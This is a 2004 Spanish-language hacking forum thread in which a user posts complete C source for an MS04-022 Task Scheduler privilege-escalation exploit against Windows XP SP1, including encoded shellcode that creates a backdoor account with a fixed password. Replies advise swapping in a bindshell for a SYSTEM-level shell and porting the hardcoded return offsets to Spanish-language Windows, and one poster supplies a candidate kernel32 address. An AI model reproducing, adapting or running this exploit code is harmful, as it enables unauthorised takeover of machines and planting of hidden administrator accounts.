elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: Sigue las noticias más importantes de elhacker.net en ttwitter!


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Nuevo exploit para Windows XP sp1
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Nuevo exploit para Windows XP sp1  (Leído 2,254 veces)
gachon

Desconectado Desconectado

Mensajes: 104


!no a las patentes de software!


Ver Perfil WWW
Nuevo exploit para Windows XP sp1
« en: 30 Julio 2004, 01:43 »

hola muy buenas ,, la noticia es  http://cyruxnet.org/news.htm
este es el exploit;
------------------------------------
 
Código:
/* 

   ms04-022 exp  for xp sp1

   by sbaa 2004.7.20

   create a system account IUSA password k911



*/

#include <stdio.h>

#include <windows.h>





unsigned char job_head[] =

"\x47\x04\x01\x00\xD9\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\x46\x00\x92\x00\x00\x00\x00\x00\x3C\x00\x0A\x00"

"\x20\x00\x00\x00\x00\x14\x73\x0F\x00\x00\x00\x00\x03\x13\x04\x00"

"\xC0\x00\x80\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

"\x00\x00\x00\x00\x00\x00";



unsigned char job_end[] =

"\x00\x00\x00\x00\x04\x00\x44\x00\x3A\x00"

"\x5C\x00\x00\x00\x07\x00\x67\x00\x75\x00\x65\x00\x73\x00\x74\x00"

"\x31\x00\x00\x00\x00\x00\x00\x00\x08\x00\x03\x13\x04\x00\x00\x00"

"\x00\x00\x01\x00\x30\x00\x00\x00\xD4\x07\x07\x00\x0F\x00\x00\x00"

"\x00\x00\x00\x00\x0B\x00\x26\x00\x00\x00\x00\x00\x00\x00\x00\x00"

"\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"

"\x00\x00\x00\x00";





unsigned char shellcode[] =



"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x42\x01\x80\x34\x0A\x99\xE2\xFA"

"\xEB\x05\xE8\xEB\xFF\xFF\xFF\x70\x31\x99\x99\x99\xC3\x21\x95\x69"

"\x64\xE6\x12\x99\x12\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5"

"\x9A\x6A\x12\xEF\xE1\x9A\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA"

"\x74\xCF\xCE\xC8\x12\xA6\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED"

"\x91\xC0\xC6\x1A\x5E\x9D\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF"

"\xBD\x9A\x5A\x48\x78\x9A\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A"

"\x5A\x58\x78\x9B\x9A\x58\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F"

"\x97\x12\x49\xF3\x9A\xC0\x71\xBD\x99\x99\x99\xF1\x66\x66\x66\x99"

"\xF1\x99\x89\x99\x99\xF3\x9D\x66\xCE\x6D\x22\x81\x69\x64\xE6\x10"

"\x9A\x1A\x5F\x95\xAA\x59\xC9\xCF\x66\xCE\x61\xC9\x66\xCE\x65\xAA"

"\x59\x35\x1C\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32\x7B"

"\x77\xAA\x59\x5A\x71\xCA\x66\x66\x66\xDE\xFC\xED\xC9\xEB\xF6\xFA"

"\xD8\xFD\xFD\xEB\xFC\xEA\xEA\x99\xD1\xFC\xF8\xE9\xDA\xEB\xFC\xF8"

"\xED\xFC\x99\xCE\xF0\xF7\xDC\xE1\xFC\xFA\x99\xDC\xE1\xF0\xED\xC9"

"\xEB\xF6\xFA\xFC\xEA\xEA\x99"

"\xFA\xF4\xFD\xB9\xB6\xFA\xB9\xF7\xFC\xED\xB9\xEC\xEA\xFC\xEB\xB9\xD0\xCC\xCA\xD8"

"\xB9\xF2\xA0\xA8\xA8\xB9\xB6\xF8\xFD\xFD\xB9\xBF\xBF\xB9\xF7\xFC\xED\xB9\xF5\xF6"

"\xFA\xF8\xF5\xFE\xEB\xF6\xEC\xE9\xB9\xF8\xFD\xF4\xF0\xF7\xF0\xEA\xED\xEB\xF8\xED"

"\xF6\xEB\xEA\xB9\xD0\xCC\xCA\xD8\xB9\xB6\xF8\xFD\xFD\x99";





int main(int argc, char* argv[])

{

   char buf[40960];

   int len=0,i=0;

   WORD len_name;

FILE *fp;

fp = fopen("create_account.job", "wb");

if(fp)

{

len=sizeof(job_head) - 1;

memcpy(buf, job_head, len);



len_name=1024;



buf[len]=len_name/2%256+1;

buf[len+1]=len_name/2/256;

len=len+2;

for(i=0;i<len_name/2;i++)

{

   buf[len+i*2]=i%128?i%128:i/128+1;

   buf[len+i*2+1]=0x0;

}

memcpy(buf+len+518,"\x1e\x34\xc6\x77",4);

memcpy(buf+len+534,"\xe9\x63\x03\x00\x00\x90",6);

memcpy(buf+len+562,shellcode,sizeof(shellcode)-1);

     

memcpy(buf+len+len_name, job_end, sizeof(job_end)-1);



fwrite(buf, 1, len+len_name+sizeof(job_end)-1, fp);

fclose(fp);



}

return 0;

}
------------------------------------
dice que crea una cuenta de usuario de nombre "IUSA" y password "k911 y que solo funciona en los en WinXP SP1 en Inglés.

--bueno ahora quiero preguntar ¿si para que funcione en un winxp español que tendria que hacer ?
--solo pregunto que tendria que hacer ,, no que me lo hagais,, antes  de que me digais nada,,,,
(tendria que cambiar los offsets o no)
--y otra cosa por lo que se ve este exploit no da shell ,,,
--¿para que me diera shell tendria que cambiar la shelcode de hay
por una que shelcode que de shell ,,no?

bueno gracias y saludos,,,,,,,,,
« Última modificación: 30 Julio 2004, 09:10 por gachon » En línea

Rojodos
Colaborador
***
Desconectado Desconectado

Mensajes: 3.537



Ver Perfil WWW
Re: Nuevo exploit para Windows XP sp1
« Respuesta #1 en: 30 Julio 2004, 07:42 »

Bueno, yo solo te dire una cosa:

- A ver si de una puñetera vez metemos los sources de cualquier programa, exploits, etc etc... dentro de las ETIQUETAS CODE --> [ code] ------ [ /code]

Salu2
En línea

Rojodos
Colaborador
***
Desconectado Desconectado

Mensajes: 3.537



Ver Perfil WWW
Re: Nuevo exploit para Windows XP sp1
« Respuesta #2 en: 30 Julio 2004, 10:21 »

Bueno, una vez que lo has hecho (lo de los CODE), pues te cuento :D

Este exploit es LOCAL, es decir, solo lo puedes usar si es ejecutado LOCALMENTE (en la misma maquina que kieres hackear) por ti o por alguien. Es decir, no lo lanzas contra un servicio remoto (caso de los famosos bugs del RPC o el NTDLL)

Obviamente, cuando tratas de exploitar un bug local, lo que mas te interesa es tener permisos de admin, ya que la cuenta shell ya la tienes (aunque sea una cuenta de invitado). Si cambias la shellcode por otra (por ejemplo, una bindshell), pues en teoria funcionara, y al ejecutarse el exploit, dejara abierto un puerto con una terminal de comandos esperando, con permisos de SYSTEM.

En cuanto al tema de los offsets, yo diria que el meollo de la cuestion esta aqui:

Código:
memcpy(buf+len+518,"\x1e\x34\xc6\x77",4);

memcpy(buf+len+534,"\xe9\x63\x03\x00\x00\x90",6);

El primero, apunta a una direccion de pila:  77c6341e y el segundo no tengo ni idea xDDD, pero vamos, tiene pinta de ser los offsets (harcodea la direccion de la shellcode en la pila?) al menos el primero.

La shellcode la podrias cambiar, pero seguro que es una de esas genericas que funciona en cualquier windows, de cualkier idioma. Solo hay que leer a RaiSe (www.undersec.com) para ver que eso es posible.

Otra cosa, como ya te digo, es los offsets de la shellcode en la pila, osea, donde hay que saltar para ejecutarla. Y como en cada windows (idioma, service pack, etc...) la pila y las dlls son distintas, pues....

Cuestion de probar, ollydebuger, y pillar los offsets.

Si alguien se anima...

Salu2

En línea

WiNSoCk

Desconectado Desconectado

Mensajes: 229



Ver Perfil WWW
Re: Nuevo exploit para Windows XP sp1
« Respuesta #3 en: 30 Julio 2004, 21:33 »

Rojodos:

Código:
Servicio no disponible!!!!

Es lo que sale en esa url ¿esta bien puesto entre las etiquetas? :P
En línea

Rojodos
Colaborador
***
Desconectado Desconectado

Mensajes: 3.537



Ver Perfil WWW
Re: Nuevo exploit para Windows XP sp1
« Respuesta #4 en: 30 Julio 2004, 21:41 »

Pues es una pena :(

De todas formas, todos los textos de Undersec, son de la ezine 7a69.

www.7a69ezine.org

En la sección de Ezines de la web de elhacker.net tambien la encontrareis.

Salu2
En línea

Linuxtron

Desconectado Desconectado

Mensajes: 44



Ver Perfil
Re: Nuevo exploit para Windows XP sp1
« Respuesta #5 en: 4 Agosto 2004, 23:38 »

Offset para

WINXP PRO SP1 ESP   0x77E7AE59         Encontrado en kernel32.dll

Quedaria asi?
Código:
memcpy(buf+len+518,"\x59\xae\xe7\x77",4);

memcpy(buf+len+534,"\xe9\x63\x03\x00\x00\x90",6);

¿y en este caso hace falta algo mas? ¿tendria q modificar la 2 lineas tmb?

Thx

pd:ostia y ahora que lo pienso, sobre que libreria tenia que buscar para sacar el offset? yo lo he hecho de kernel32, asi que supongo que sera otra?  Dnd lo dice? No lo pone en el exploit?
..............no me digas que lo tengo q buscar con el ollydebugger.........
« Última modificación: 6 Agosto 2004, 09:29 por Linuxtron » En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Duda de exploit para windows 7
Hacking Básico
oliver91 7 4,330 Último mensaje 3 Junio 2011, 20:10
por oliver91
¿exploit windows 7?
Bugs y Exploits
murdoxix 3 3,300 Último mensaje 4 Abril 2012, 14:58
por ps3ps3ps3
Private Exploit Pack: Nuevo kit de explotación de navegadores anunciado en ...
Noticias
wolfbcn 1 2,701 Último mensaje 7 Julio 2013, 07:40
por spiderman4
Nuevo VLC para Windows 10
Noticias
wolfbcn 1 1,166 Último mensaje 9 Agosto 2015, 18:25
por Orubatosu
Nuevo exploit para PS Vita permite instalar homebrew fácilmente
Noticias
wolfbcn 0 691 Último mensaje 1 Agosto 2016, 02:54
por wolfbcn
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines